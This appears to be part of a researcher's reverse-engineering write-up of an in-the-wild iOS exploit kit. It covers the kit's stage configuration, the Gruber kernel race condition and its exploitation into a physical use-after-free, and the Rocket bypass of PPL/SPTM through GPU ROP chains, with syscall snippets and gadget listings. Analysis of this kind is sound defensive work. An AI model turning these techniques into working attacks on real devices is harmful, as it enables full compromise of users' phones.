0xf3700000 cab13d34917b6f5bdcfc69d7c668021b735a4d82b05b0918b9e228dc1860988e b'1334417664270db20af705f422878c53c8378203.min.js'
0xf2800000 6662406a17f3a38fdbbf9938d3c4c07b649ad22cf6d6f4c00bc9db96910b3817 b'226cbd845c5f470075505392be8693ec6d4f5ba3.min.js'
0xf3800000 fdd8b3940d2a06b0229d814e874095fd1fa87cb53db4699ba9dd8dd7370cf8cc b'ae7efd66ecde9e964cfe92f64e9b6461fce38f28.min.js'
0xf2900000 8360789e772f55126e9114dc7965d3162d6b7a781ddfa69be0971c66f04e6045 b'7a1cef00016b950be42f5288ead21fa6fccc3107.min.js'
0xf3900000 388976a2cdce966476ddc0f79249081ec182efc26808beb2e2e456f8c4809535 b'377bed7460f7538f96bbad7bdc2b8294bdc54599.min.js'
0xf3730000 3cb781d9c1ade5c3b54606839baa51f5c5751f73f0cd055fc101e41d467403d7 b'c8a14d79a27953242d60243ee2f505a85d9232cc.min.js'
0xf3830000 bdff99612a2aa99aef5cd7845d7f0b06a77c36d4f674fab7939799a39b8f78b1 b'1b2cbbde08f8b2330b7400abcb97c9573973e942.min.js'
0xf2750000 58199343c3811b01adda525bc08fcf135c6369fb3bdc3d52ca2374491e789f48 b'e9f898587620186e31119fbf32660f26c1e048e0.min.js'
0xf3750000 a6244c09c0588cf126ad727f75a647132543239c8b8fff5d362d56b616752327 b'f4120dc6717a489435d86943472c5a2444aac8e6.min.js'
0xa2050000 7da5f7d73e652aa782c89a883c27d0898affddf5d13b5914423a66a15ad3b319 b'f8a86cf368fdbbe294813926a2a229df041eb758.min.js'
0xa3050000 c02c657bb22d6cfc6aed70143f1fc8fbd44f33dbe6e12979d10c7891dcfc25c7 b'72a5ac816709f9c331f2b3afb76cd3d96517ea14.min.js'
0xa3060000 338bf220589af21d44e4dda167fab47c99040da951c40406ff99b5c4cc48735e b'980c77f1747afa9ac1fa5f8fbfb9e6663e9f82bb.min.js'
0xa3030000 be7efb67c5b39656f00f03b5a06593bf41bd760e5280a887f0a701226f39c3c8 b'5e89f83ec50c6223d664d3f3260ef874a3d6d796.min.js'
0xa3040000 a19b901b47f9dd7b86ca75fa1d25bd4404e9cdd2e2bf56722149fc213434f00e b'2a1d692b7b5ba793527b2c14b48db21a3e5d2c5f.min.js'

Basically this configuration file contains one element of type 0x70000, which is also the expected one and then in there there is a list of <type>, <ChaCha20 key>, <url> tuples. The selection code supports 0xA2000000 (arm64) and 0xA3000000 (arm64e) for the higher bits and 0x30000, 0x40000, 0x50000 or 0x60000 for the lower bits, based on CPU features/Core generation for the relaxed sandbox case and 0xF1000000 (non-ARM), 0xF2000000 (arm64), 0xF3000000 (arm64e) and 0x900000, 0x800000, 0x700000, 0x400000 or 0x300000 for version/model. For our capture 0xF3900000 is selected. Due to a logic bug, ".min" is actually stripped and the files are downloaded as regular .js files. So it downloads 377bed7460f7538f96bbad7bdc2b8294bdc54599.js in our case. After decryption and decompression we get the following file:

elem: 0x80000 0x3 @ +0x78 (0x37e40)
elem: 0x90000 0x3 @ +0x37eb8 (0x516d0)
elem: 0xf0000 0x3 @ +0x89588 (0x2eb40)
elem: 0x70005 0x3 @ +0xb80c8 (0x2c)
elem: 0x50000 0x3 @ +0xb80f4 (0x610c)
elem: 0x90001 0x3 @ +0xbe200 (0x50a40)
elem: 0x70000 0x3 @ +0x10ec40 (0x1d4)
0x2900000 85ab5908ceb1981df3449b52155a5026561c51d6f9f599acc99c5203b14733eb b'4612aa650e60e2974a9ec37bbf922c79635b493a.min.js'
0xe2900000 b252669de4b4adc34114fdf10d75f66b3efad6280f4fcd19603f6fac5873ede2 b'4817ea8063eb4480e915f1a4479c62ec774f52ce.min.js'

The new config (0x70000) contains entries for the PE, of which the kit will later download (0xe2900000). 0x70005 is the process name the PE should get injected to (powerd in our case). The remaining files are two MachOs each, which we will look at in detail next.

The code will then update the configuration with the following ids:

0x70001: resource url
0x70002: ChaCha20 key
0x70003: document url
0x70004: user agent
0x70006: logging url

Afterwards the new config (0x70000) is returned. If dyld_task_info.all_image_info_addr->jitInfo is not populated it will fetch 0x50000 and then load 0x90001 as a MachO, resolve _driver from it and call that function. This then generates a new context which is further populated by the main function. Afterwards it maps some memory as RW, copies the 0x50000 shellcode there, protects it executable and does some further setup on the context. Afterwards jitInfo+0x4000 is called regardless and parts of the context are repopulated. Finally 0x80000 is loaded and mapped, _start is retrieved from it and then this method is invoked. 0x90000 is finally invoked inside of 0x80000 and then contains the main LPE and PPL/SPTM bypass logic. At the moment I haven't done any in-depth analysis on 0x90001 and 0x50000, but I potentially will come back to them at some point in the future.

3.4.5. 0x80000 MachO

Due to time constraints, I also only had a high-level look at this MachO. It seems to be the PE orchestrator, loading the main PE MachO (0x90000), calling _driver on it to get back a context and then call functions inside of this context to run the PE, the PPL/SPTM bypass and later load the implant.

3.4.6. 0x90000 MachO

The 0x90000 MachO is the main PE stage. In it are both Gruber (the kernel LPE) and Rocket (the PPL/SPTM bypass). Specifically, the function @+0x18 in the driver struct is responsible for kickstarting the LPE. It will first initialise a very big LPE context struct. Then does some fingerprint detection. Initialises yet another context for the PE itself, runs it, then bootstraps a kernel parsing framework. From there it will start to escalate privileges. For example it will find developer_mode_status and allows_security_research and overwrite both of them. The function @+0x20 will then act as a C2C function exporting certain commands to the caller. Some of these commands require a PPL/SPTM write primitive in which case Rocket is run to set up a self-referencing page table entry which is then used to bypass PPL/SPTM protections.

3.5. kernel R/W (Gruber)

Gruber is a race condition between a vm_map and a mach_make_memory_entry_64 call that leads to a reference drop on a vm_object, which can then be turned into a pUAF from which they gain an early read and a physical mapping primitive. With the early read they can resolve each virtual address they are trying to access to a physical one and then use the physical mapping primitive to read and write to it. This also gives them a pointer to their task struct from which they can easily find all other important kernel structures. From then depending on version they deploy different stable R/W strategies that I'll also describe in here.

3.5.1. Figuring out the bug

Because this was super hard to figure out, I think it's easiest to take you along for the ride instead of just describing the bug right away. I'll skip over a lot of setup to keep this part a bit shorter, we will talk about this more in-depth in the exploitation section.

Initially the exploit will find a submap (vm depth is 1) which is at least 18 pages big. It will then create a memory entry for each of the racer threads (count depends on the device) of these 18 pages. Then the first of these ports is selected for the main thread and the memory is mapped via vm_map. Afterwards they allocate a mapping that is one page bigger than the target size and call vm_copy to create a virtual copy from the first mapping onto the second one. Then the first mapping is deallocated. Afterwards they clip the copy mapping. This is done by allocating over the final page of the copy mapping and then deallocating it again. This guarantees that the vm_entry of the copy mapping only spans it. With this the setup is done and exploitation can begin. The reference count of the vm_object is fetched (via vm_region_recurse_64). This is done throughout the exploit to validate that the bug triggered successfully and a reference was dropped. Then the racer threads are launched and once they are up they try to perform a vm_map call in parallel to the main thread performing a mach_make_memory_entry_64 call. Both of these calls pass the first memory entry port as an argument. The mach_make_memory_entry_64 call as the parent entry, the vm_map call to map that memory. The arguments for vm_map are:

vm_address_t addr = 0;
// ...
ret = vm_map(mach_task_self(),
            &addr,
            size,
            0,
            VM_FLAGS_FIXED,
            memory_entry_port,
            0x0,
            true,
            VM_PROT_READ,
            VM_PROT_READ,
            VM_INHERIT_DEFAULT);

As you can see, because VM_FLAGS_FIXED is set and addr is 0, this call will always fail and return KERN_INVALID_ADDRESS. mach_make_memory_entry_64 is invoked like this:

mach_make_memory_entry_64(mach_task_self(),
                        &size,
                        0x0,
                        VM_PROT_READ,
                        &new_port,
                        memory_entry_port);

Then the ref count of the vm_object is fetched again, and if it didn't increase, the race was successful, otherwise its reattempted. The code expects up to the thread count amount of references to be dropped, which is a good indicator that the vm_map call is dropping the reference—each vm_map call has the ability to drop one.

The only other good information that is easily obtainable is that in 17.3 when the bug was patched, Apple now takes a lock on the parent entry in mach_make_memory_entry_64 while before it didn't (shoutout to Apple for lately putting out fine grain XNU source code releases!).

The main issue that remains is that the vm_map call runs through so much kernel code (thousands of lines) that it's very hard to figure out what side effect in the mach_make_memory_entry_64 causes the reference to be dropped. We tried to figure this out statically for easily 50+h (shoutout to everyone hanging in voice with me!) but we just couldn't find the root cause. Then I had an idea: I could use Corellium to get two execution passes in the kernel, one where the race succeeded and we dropped the ref and one where it failed. Then I could compare both of the traces and hopefully by looking at where they diverge the root cause just falls out.

3.5.1.1. Getting Corellium traces

(click to expand)

In the past I've used Corellium's HyperTrace feature to get kernel execution traces. "Luckily" the feature was broken on my Corellium/model/version combination, which led me to try out CoreXight instead. This is an even lower level feature based on CoreSight, which allows full vm tracing including usermode, which proved very useful for this, because it allowed me to align the two traces on the vm_map syscalls.

To initiate a trace you need to connect to the Charm console and issue a armtrace command:

$ rlwrap socat - /run/charmd
armtrace name:<vm name> stream:/tmp/capture.bin filter:"clear: name:<process name>" el1:1

This will then trace the vm <vm name>, filter for the process <process name> and el1:1 specifies that we want to get kernel traces from EL1 (instead of for example tracing an exclave). The trace will be saved to /tmp/capture.bin. Importantly this will generate very large traces, which also complicates analysis so ideally you want to capture for as short as possible. I basically had two panels open, quickly triggered in the first one, ran my reimplementation of the exploit in the second till it succeeded and then quickly stopped the trace in the first one (simply issuing armtrace name:<vm name> without any arguments will stop and then save the trace).

The trace is saved in a custom format, but Corellium provides a tool (corexight) to parse it and emit it as a very large text file. The tool can also consume MachOs in order to get basic block information and resolve syscalls. I invoked it with the following parameters:

corexight /tmp/capture.bin -strace /usr/share/corellium/strace/ios-arm64.csmf -global macho:/tmp/kc@0xfffffff029d04000

The first argument is the trace file, followed by the syscall definition to allow resolving of those and then the MachO of the kernel. Using @0xfffffff029d04000 you can specify the load address of the MachO (which for the kernel you can find in the UI under Settings).

A trace then looks like this:

 5  1430 gruber           51072 > 0x00000001df14c1d4 mach_msg2 ( msg: 0x16d60ae38 -> { msgh_bits: 0x80001513, msgh_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, msg: [ 0x01 0x00 0x00 0x00 0x6b 0x38 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x13 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x80 0x04 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00 ... ] }, option: 0x200000003 (MACH_RCV_MSG|MACH_SEND_MSG|0x200000000), msgh_bits: 0x80001513, send_size: 100, msgh_remote_port: 515, msgh_local_port: 0x117b7, msgh_voucher_port: 0, msgh_id: 4811, rcv_msgh_bits: 1, rcv_name: 0x117b7, rcv_size: 52, notify: 0, timeout: 0 ) ... @[ 00000001df14bf70 00000001df154bd4 00000001df154ac0 0000000102ab0c40 000000020175b4d4 000000020175aa10 ]
 5  1430 gruber           51072 0xfffffff02aacb474-0xfffffff02aacb477
 5  1430 gruber           51072 0xfffffff02aacb478-0xfffffff02aacb4bb
 5  1430 gruber           51072 0xfffffff02aacc560-0xfffffff02aacc563

I already prefiltered the trace using this grep chain | grep gruber | grep -v "# exception" | grep -v "simulator break" | grep -v "now running in" | gzip because corexight only runs on Linux and I wanted to analyze the trace on my Mac. I basically filter for only my process, filter out all interrupts and exceptions and then gzip the result to get it on my Mac.

My final traces had one small difference in the beginning (likely something during syscall entry) but then they heavily diverged later on and seeking to the address right before the divergence brought me right to the root cause. 30 min of dynamic analysis beating 50+h of static analysis, so I can only recommend this approach if you have the possibility to do it.

So thanks to dynamic analysis with the traces, we know that the flow diverges in a function called vm_object_copy_strategically. This is a helper function which will tell the caller how they can perform a copy of the vm_object. Basically, at this point in the vm_map flow, the kernel needs to decide how they should provide the backing memory to the about to be created mapping. The function will based on the copy_strategy field of the vm_object tell the caller to either perform a fast (MEMORY_OBJECT_COPY_SYMMETRIC) or slow (MEMORY_OBJECT_COPY_DELAY) copy. In order for the race to succeed, this function needs to see the copy_strategy field as MEMORY_OBJECT_COPY_SYMMETRIC which will lead vm_map to call vm_object_copy_quickly, but before this call the code in mach_make_memory_entry_64 needs to change the copy_strategy to MEMORY_OBJECT_COPY_DELAY. In this case vm_object_copy_quickly will fail and return an error, but the outer calling code didn't check the return value and blindly assumed the copy succeeded. In the case where vm_object_copy_quickly succeeds it will increase the ref count of the vm_object by one so the vm_map code (blindly trusting it to succeed) will drop one ref unconditionally after the call, which in case of failure leads to the ref count dropping by one too many.

3.5.2. Gruber RCA

mach_make_memory_entry_64 didn't take a lock on the parent memory entry, which allowed it to change the copy_strategy field of the vm_object outside of the lock. If the race window aligned correctly a parallel vm_map call would see the copy_strategy as MEMORY_OBJECT_COPY_SYMMETRIC during the call to vm_object_copy_strategically and decide to call vm_object_copy_quickly, based on its return value, but because the copy_strategy could be changed to MEMORY_OBJECT_COPY_DELAY the call to vm_object_copy_quickly could fail. The outer code in vm_map assumed the call to vm_object_copy_quickly always succeeded and dropped a reference unconditionally, which in the failure case led to dropping one reference too many, which could then be turned into a pUAF.

3.5.3. Exploitation

The high-level preparation steps are preparing the physical pages free pool for the pUAF and preparing the mappings and mach ports in order to be able to spray vm_map_entry and vm_object objects. For this the exploit uses mach_msgs with MACH_MSG_VIRTUAL_COPY OOL descriptors.

In order to guarantee correctly triggering the bug, they initially created enough memory entry ports (equal to the racer thread count) to reference the vm_object at least as many times as the racer threads could drop references, to still end up with 4 references after triggering the bug successfully, even if all the race threads win. Because of this, after getting the reference count of the vm_object, they use these ports to drop enough references to get down to 4 refs. From the setup they also still have a CoW mapping of the memory. By faulting it in, they drop two more references. The final two references are then dropped by freeing the port that the mach_make_memory_entry_64 call returned. This will free the vm_object in a way that still leaves dangling PTEs pointing to the physical pages of the mapping, but returns the vm_pages representing the mapping back to the free pool, a classical pUAF scenario. For older iOS versions, the exploit works a bit differently, making me think that the CoW fault getting the object down to 2 refs is an important part of the trigger mechanism, but I don't have deep enough knowledge of the internals of the vm subsystem to be sure about this. They now have two UAFs, the pUAF they want and a UAF on the vm_object (because the vm_entry still points to it). In order to resolve the latter, they try to reallocate the vm_object by spraying objects via simple vm_allocate calls. Specifically, they pass VM_FLAGS_PURGABLE here, which I assume avoids allocating physical pages from the free pool for these objects. In order to know that they have successfully reallocated the vm_object, they abuse the fact that the object_id_full inside of the VM_REGION_SUBMAP_INFO is just a mangled pointer of the vm_object. So by fetching the VM_REGION_SUBMAP_INFO of their mapping (via vm_region_recurse_64) and looking at the object_id_full they can know if they successfully reallocated the vm_object when the IDs match. They also try to observe a certain pattern of these IDs prior to triggering the free of the vm_object, so far I haven't been able to figure out exactly what they do there, but my best bet is that they can predict the state of the kernel allocator by observing the pattern of the allocated objects and try to get it into a favourable state to have a higher chance of successfully reallocating the vm_object after it is freed (instead of it getting snatched by another thread for example).

Their next step is to reallocate the pUAF'd memory with kernel objects. For this in the next step they want to have a clean physical page free list or rather know when the kernel will start to consume their pages. So they will allocate memory and place a marker on it, then observe the pUAF mapping to see if the marker appears and continue that in a loop till it does.

They trigger the bug twice: once using mach_make_memory_entry_64 and a second time using mach_msg calls to spray vm_objects and vm_entry. They then detect them on their pUAF mappings by doing pattern matching. For vm_objects they:

validate that the reference count is not more than 0x80
that the pp linked list makes sense
that some bitfields are correctly set
and finally that the size matches

They only reject on the first condition, because they can't guarantee that their vm_object is the first one on the page or if it's a foreign one, but then use the other checks to validate it's theirs.

For vm_entrys they validate that links.prev looks like a kernel pointer and that their memory tag (0xcc) matches the one in the sprayed entries. It then checks if both links.start and links.end point into the correct mapping and that the entry has no subentries in the R&B tree.

3.5.4. Early read

For the early read they will receive the mach messages that hold the OOL descriptors until they observe the address inside of the observed vm_entrys changing to the one that is pointed to by the received OOL descriptor. This means they now received the correct mach message. Should they not observe the change they will then free the memory right away to not have too much memory usage by their process and after identifying the correct message they will destroy all other ones. With the receive the vm_entry moved from the copy map inside of the mach message to the process's vm_map. The exploit can then make the following changes to the entry:

point links.next to the address they want to read from (+ an offset)
truncate the mapping by reducing links.end by one page

In addition they also remove the entry from the R&B tree by setting links.prev->links.next = links.next. I assume this is just to avoid the system from finding this entry outside of the exploit calls.

Then they call vm_region_64 on the now clipped page. This leads to vm_map_lookup_entry not finding the entry when walking the R&B tree. The behaviour of vm_map_lookup_entry is to then return the last entry it saw during the walk before the address of the current entry exceeded the target address. On the other end vm_region_64 will return information on the next available address. So if you for example call vm_region_64 on 0x0 but there is only a mapping @ 0x4000 it will set address to 0x4000 and return the information of the entry at 0x4000. To get to this behaviour it has the following code:

if (!vm_map_lookup_entry(map, start, &tmp_entry)) {
    if ((entry = tmp_entry->vme_next) == vm_map_to_entry(map)) {
        vm_map_unlock_read(map);
        return KERN_INVALID_ADDRESS;
    }
} else {
    entry = tmp_entry;
}

So if the lookup fails (and thereby returns the last entry it saw) it will take tmp_entry->vme_next to get to the next entry. In the flow they then fully control entry and luckily for them the code only copies out information from the entry without doing any other validation on it giving them a nice read primitive:

start = entry->vme_start;

basic->offset = VME_OFFSET(entry);
basic->protection = entry->protection;
basic->inheritance = entry->inheritance;
basic->max_protection = entry->max_protection;
basic->behavior = entry->behavior;
basic->user_wired_count = entry->user_wired_count;
basic->reserved = entry->is_sub_map;

*address_u = vm_sanitize_wrap_addr(start);
*size_u    = vm_sanitize_wrap_size(entry->vme_end - start);

basic here is the structure returned to usermode.

After the read they restore the original values.

3.5.5. Physical mapping primitive

For the physical mapping primitive they will use the first vm_object they can find. From it they strip the internal and alive flags and then add the phys_contiguous and pager_initialized flag and set the vou_shadow_offset to the physical address they want to map. They can then map this vm_object via vm_map and because of the flags they set it will map the physical address specified in vou_shadow_offset. From there they can modify it. They seem to then escalate this further to another vm_object, I am not sure what the reason for this is. For this one they will set the offset to 0 and the vou_size to -1. From then on they can map any physical address by setting the offset to the desired physical address in their calls to vm_map.

3.5.6. Escalating further

They can read vou_owner to get to their task, from there they can easily resolve any port in their port space. I haven't closely reversed the rest of the function, but the rest of it seems to be mainly cleanup of all the objects as well as exporting the primitives so that regular R/W functions can use them.

3.5.7. Stable R/W strategies

They implement 5 different write strategies:

via tfp0
via IOSurface (selector 33)
via pipe buffers
via ioctl (FIOSETOWN)
via their mapping primitive

Instead of using the mapping primitive they initially set up with the offset they instead have to modify kernel structures for this one (again I really don't understand why they duplicate primitives here). For this they need a 64-bit kernel write. For this one they will first steal the IOGPU port from SpringBoard during setup and then use it to create an IOGPU object. Then they use their original mapping primitive to map this object and use IOGPUDeviceUserClient::s_delete_resource -> IOGPUDevice::delete_resource -> IOGPUResource::sharedRelease -> IOGPUDevice::decrement_allocated_size as a 64-bit decrement primitive to do that write. Not sure why this indirection is necessary.

For the kernel read they have several strategies:

via tfp0
via IOSurface (selector 16)
via pipe buffers

Initially, I didn't understand why they even need these read functions when they could instead use the mapping primitive to map the data into usermode and then read it from there, but Alfie correctly pointed out that in order to read PPL/SPTM-protected mappings, they can't map them (as that would lead to a kernel panic), so it makes sense why they have to provide these primitives here.

Depending on version (and I assume sandbox) a working primitive is selected.

3.6. PPL/SPTM bypass (Rocket)

As the final step before they can load their implant, they need to bypass PPL (on modern phones, SPTM). For this, they gain GFX (GPU) code execution, defeat that coprocessor's μPPL implementation, and then use full GFX physical memory access to create a self-referencing page table entry (PTE) on the AP, which they can use to bypass PPL/SPTM when writing to protected memory.

3.6.1. GFX

The GFX is the GPU coprocessor on Apple Silicon. It runs its own firmware (a variant of RTKit) and communication from the AP is done via two kernel drivers: IOGPU, the high-level driver, which then talks to AGXG, the low-level driver, which is different for each generation of Apple Silicon. Usually coprocessors are behind what is called a Device Address Resolution Table (DART), which is an IOMMU that restricts the coprocessor's access to physical memory. AP PPL/SPTM will then manage the DART configuration to make sure the coprocessor is unable to DMA onto protected memory. However, the GFX is not behind a DART, likely for performance reasons, because it needs to access a lot of memory and context switch between different tasks/memory mappings very often. Apple decided to mitigate this risk by having a GFX PPL implementation they call μPPL, which is then responsible to make sure that the GFX can't access protected memory even when an attacker gains code execution on it. The authors of the exploit kit seem to have realised that this makes the GFX a prime target for a PPL/SPTM bypass, because fewer eyes were on it, and it is used in all of their bypasses.

3.6.2. Rocket

In iOS 17.4, there is one change I associate with a patch for Rocket: GFX's __arm_arch_resume_uat used to load raw values for ttbr0/1 from memory and now no longer does. Prior to that change, when the GFX would wake up from hibernation, it would load the pointers to the root-level page tables directly from memory. This meant that if an attacker could gain control over the memory, they could load their own fake page tables on resume, allowing them to bypass μPPL and then, with full physical memory access, create a self-referencing PTE on the AP to bypass AP PPL/SPTM.

3.6.3. Exploitation

The function that sets up the self-referencing PTE entry will initially do a lot of offset finding on com.apple.iokit.IOGPUFamily, com.apple.AGXG<xyz> kexts and the GFX firmware. Afterwards it attempts to steal the IOGPU port from backboardd (not sure why they need to do this again when they already have one from SpringBoard). If they can get the port they will create a new command queue and two shared memory objects. Then they will submit a command buffer on both of the shared memory objects, follow pointer chains in the kernel to find their kernel addresses and then use the physical mapping primitive to map them into their address space. But the function also supports operating without the stolen port. Once they have all the offsets and the IOGPU setup, they will create fake page tables for the GFX and prepare mappings for the self-referencing AP PTE.

For this they use yet another primitive: the ability to kalloc memory that they don't own, but that is owned by the kernel. Depending on the XNU version they will either grow the ipc_port_request_table to the size they want it to be and then remove it from their victim port or they have two different methods of using the backend buffer of a mach message to allocate their memory. The reason they need to do this is to have the GFX memory stay alive even after their process no longer exists.

With the mappings prepared they will then set up a ROP chain that is meant to be executed on the GFX. Depending on the SoC they execute one of three ROP chains. From a high-level PoV, all the ROP chains revolve around entering hibernation with a controlled hibernation state so that on wake-up thanks to the state control they will regain code execution and also run with fully controlled page tables. Generally speaking, their ROP chain will: restore the entry point (to avoid executing the ROP chain again), set up hibernation data structures in a way where they will regain code execution with controlled page tables, return back to regular execution and wait for hibernation or trigger it themselves. Then once they wake up from hibernation and regained code execution with the fake page tables they will set up the self-referencing PTE on the AP and then gracefully exit ROP to continue regular execution.

To kick off the chain they will insert a job into the GFX job list which only contains a single GPU fence/stamp operation. This gives them a 32-bit write primitive on the GFX. With this 32-bit write they overwrite the thread state pointer of the power thread to point to their own (they overwrite byte 1-5 to allow full control of the pointer with 32 bits except for the bottom byte and then align their fake object to the same bottom byte as the original pointer). This allows them to gain code execution in the context of the power thread once it gets scheduled again. When they have a stolen port they can easily submit a job to the GFX using an external method (and some patching of data structures to insert that malformed fence operation) while without it they will use the physical mapping primitive to map the job list and directly insert the job into it.

3.6.3.1. GFX ROP chain

(click to expand)

The GFX ROP chains are based on this gadget:

ADD             X1, X1, #0x210
STP             X4, X5, [X1]
STR             W6, [X1,#0x10]
BL              __rtk_arch_fast_interrupt
ADD             X1, SP, #0x350+var_240
LDP             X2, X3, [X1,#-0x10]
LDR             X4, [X1],#8
MSR             CPACR_EL1, X4
LDP             X5, X6, [X1]
MSR             FPSR, X5
MSR             FPCR, X6
LDP             Q0, Q1, [X1,#0x10]
// [...] loading Q2-Q29
LDP             Q30, Q31, [X1,#0x1F0]
ADD             X1, X1, #0x210
LDP             X5, X6, [X1]
LDR             W7, [X1,#0x10]
MSR             ELR_EL1, X2
MSR             SPSR_EL1, X3
MSR             FAR_EL1, X5
MSR             PAR_EL1, X6
MSR             ESR_EL1, X7
LDP             X6, X7, [SP,#0x350+var_320]
LDP             X8, X9, [SP,#0x350+var_310]
LDP             X10, X11, [SP,#0x350+var_300]
LDP             X12, X13, [SP,#0x350+var_2F0]
LDP             X14, X15, [SP,#0x350+var_2E0]
LDP             X16, X17, [SP,#0x350+var_2D0]
LDR             X18, [SP,#0x350+var_2C0]
LDP             X29, X30, [SP,#0x350+var_268]
LDP             X0, X1, [SP,#0x350+var_350]
LDP             X2, X3, [SP,#0x350+var_340]
LDP             X4, X5, [SP,#0x350+var_330]
ADD             SP, SP, #0x350
ERET

It allows them to load all registers and perform a double jump by setting ELR_EL1 to the first address they want to jump to and X30 to the second. In practice they use it for chaining setting X30 back to the same gadget to get another invocation.

For modifying memory they use a str x1, [x0, x2]; ret gadget.

There are three different versions of the ROP chain.

For A13 prior to execution they will modify (using AP physical R/W) rtk_crt_mmu_gxf_stack_size to be 0x4028 instead of 0x4000 bytes making it overlap with some variables in data including the μPPL error state. Then in the ROP chain they will:

restore the job list (should the exploit not have access to a stolen IOGPU port)
call into μPPL via genter to remap the hibernation context (genter with cmd 0x10)
overwrite the pointer to the hibernation context with their first fake one
restore the power thread (they used for hijacking code exec)
restore the correct value for TPIDRRO_EL0 and continue execution regularly
now at some point the GFX will go to sleep and then wake up loading the first fake hibernation context thanks to the pointer overwrite, this will let them regain code exec
After getting code exec in the new context they will setup a fake one with fake page tables
overwrite the hibernation context pointer to point to fake one
restore the correct value for TPIDRRO_EL0 and continue execution regularly
The new fake context will call genter with cmd 0x24. 0x24 isn't a valid μPPL command so the handler will write the command buffer pointer to the data section so that the outer handling code can panic and provide the call as context. Because they overwrote rtk_crt_mmu_gxf_stack_size the stack is overlapping with these data globals at the moment allowing them to smash x30. This will then invoke a ldp x8, x0, [x28];mov x1, x20; mov x2, x21; blr x8 gadget and by setting x28 to memory they control prior to the genter call they now have code execution in μPPL context
this final ROP chain under μPPL will restore the hibernation context to the original value
create a fake PTE entry on the GFX
perform a tlbi vmalle1is; dsb sy; isb; ret
create the self-referencing PTE on the AP
call resume_uat with controlled hibernation context to resume code execution regularly

On A14-A17 they will:

restore the job list (should the exploit not have access to a stolen IOGPU port) (via str x1, [x0, x2]; ret)
restore the thread state of the power thread
call arm_arch_hibernate_uat regularly to dump hibernation state
insert a fake ttbr1 page table hierarchy into the hibernation state
set @+0xD8 (TPIDRRO_EL0) to the power thread and @+0xC8 (SP) to the next ROP chain
~~go into hibernation~~ reset L2C error status by writing 0x0 to 0xfffffc1100160008
perform a dsb sy; isb; ret
write 0xFFFFFFFF80000000 to 0xfffffc1100170000 to enter hibernation
spin
then they will wake up inside their ROP chain again with their fake page tables
so now they can create the self-referencing PTE on the AP
and finally they load the original power thread state from TPIDRRO_EL0 continuing execution regularly

Thanks to a tweet from Plx we now know that 0xfffffc1100160008 points to the L2C Error Status of the GFX and 0xfffffc1100170000 points to the ASC Debug Override register. I am unsure why they need to clear the L2C error status or why they write bit 31-63 in the debug override, but bit 39 is force_core_ret_reset so I assume this is what is needed for the core to reset and load the hibernation context.

Additionally, on A14 they perform a second PTE store before restoring state to unmap the second GFX MMIO region (0xfffffc1100170000) by replacing it with a regular mapping. I don't fully know why they need to do this on A14 only, but I suspect they want the AP to not read certain values from that region and then potentially panic.

I suspect that the reason they can't do the A13 attack on A14+ is stronger CTRR no longer allowing them to modify rtk_crt_mmu_gxf_stack_size as it's in the const section.

3.7. Beyond

With this they now have full physical R/W and can load the implant. I assume this is done inside of the 0x80000 MachO using the C2C function that gets exported, but this is where my reversing currently ends. In the future I want to get a better understanding of both the kernel R/W cleanup part and the GFX code execution, and then potentially look into the C2C function and the implant itself. For this, I've also prepared the next section with open questions I want answered.

4. Open Questions

This section contains all the open questions I have after my analysis so far. I will likely come back to answer them in a while and then update this post.

What obfuscator are they using/can the way JS variable obfuscation replacement generation works be matched to Metasploit's?
How is the (0)[0] JIT barrier construct exactly influencing JIT compiler state?
Is there a version where the "uo" in obj property access is needed for correct code gen?
Can we validate that gRWArray1 indices 0 and 2 are used to prevent JIT from co-loading or vector-optimizing the loads?
Why spray 256 objects after targetObj — would fewer suffice?
Why reset the float array butterfly pointer to targetObj's value instead of the original?
Is the C2C DOM update (state 6) actually used by native code?
How are they able to predict kernel allocator state with the vm_object allocation ID pattern observation?
Why escalate to a second vm_object for the physical mapping primitive?
Why is the IOGPU 64-bit decrement indirection necessary when they already have a mapping primitive?
How exactly does GFX hibernation get triggered on A14-A17?
Why is the second GFX MMIO region unmapping only needed on A14?
Where is Sparrow?
What does the rest of the Gruber kernel R/W cleanup / escalation function do?
What functionality does the C2C function export to the orchestrator and how does the orchestrator use them to load the implant?

5. References

5.1. What is PAC

Pointer Authentication Codes (PAC) is a security feature implemented in ARMv8.3 and later architectures that provides Control-Flow Integrity (CFI) against both the forward edge (prevents JOP) and backward edge (ROP). PAC works by adding a cryptographic signature to pointers, which can be used to verify the integrity of the pointer before it is dereferenced. This helps to prevent attackers from manipulating pointers to execute arbitrary code or access unauthorized memory. Apple shipped PAC on A12 and later devices, so on these devices attackers need a PAC bypass before they can achieve code execution. There is a blog post by Brandon Azad, who analysed the initial implementation and a lot more talks about bypasses on the web.

5.2. What is the JITBox/JITCage

The JITBox/JITCage is a security feature inside of WebContent that tries to prevent attackers from using the JIT region as a way to defeat CFI. There is very little public documentation on it, but I've found this presentation by Synacktiv and a talk by Luca on it. Apple basically limits what assembly instructions can execute inside of the JIT region and where the code can jump to (by disallowing unauthenticated jumps and jumps outside of the region and for authenticated jumps restricting access to the signing keys).

5.3. What is PPL/SPTM

The Page Protection Layer (PPL) on older and Secure Page Table Monitor (SPTM) on newer devices is responsible for protecting the system against an attacker who already has kernel R/W. It does so by obtaining control over the page tables as well as other important data structures and keeping them read-only from the kernel so that they can't be modified without getting a write primitive inside of the PPL/SPTM context first. Good blog posts about them can be found here, here and here.

5.4. What is a pUAF

The term pUAF was first coined by felix-pb in his kfd writeup. Contrary to a regular UAF, where the virtual address gets reused, a physical UAF (pUAF) describes a scenario where, due to a bug inside the vm subsystem, the physical pages backing a mapping get freed while the (virtual) mapping still exists. This means that the virtual address of the mapping can still be used to access the memory, but it will now point to whatever new data got allocated on those physical pages. This is a very powerful primitive as it allows an attacker to then simply spray kernel structures they wish to modify, detect them appearing on their pUAF'd mapping and then modify them straight from usermode.

6. Final words

I hope you've enjoyed the read. Thanks to everyone who helped me with this, in capture, analysis, understanding and proof reading!

If you have any questions or suggestions for improvement you can reach out to me on Twitter or via E-Mail.

